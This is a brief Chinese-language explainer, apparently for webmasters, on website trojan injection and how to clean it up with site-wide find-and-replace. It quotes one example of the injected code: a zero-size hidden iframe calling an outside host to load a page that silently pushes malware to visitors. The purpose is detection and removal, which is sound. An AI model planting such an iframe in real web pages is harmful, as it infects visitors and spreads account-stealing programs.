挂马会在所有页面末尾加入类似以下的代码行
<iframe src=http://xxx.hao1680.com/xx.htm?id=011 width=0 height=0></iframe>
有的网页有时会被挂上十几行这样的代码,代码行iframe /iframe定义的是一个页面调用,width和height定义页面的大小,代码内都是0,所以访问者看不到页面,但该页面已经被调用,并执行页面中的代码,比如将恶意软件或病毒文件下载到客户端,并在后台安装,到达某些盗号程序的扩散.任何杀毒软件和恶意软件清除工具均不会认为这些代码有问题.
解决方法,检查网页代码末行是否有类似这样结构的代码行,多检查几个网页即可确认那些代码行是木马代码,使用查找替换工具,对整个网站的页面进行搜索替换,对本地的机器也要做相同的处理.
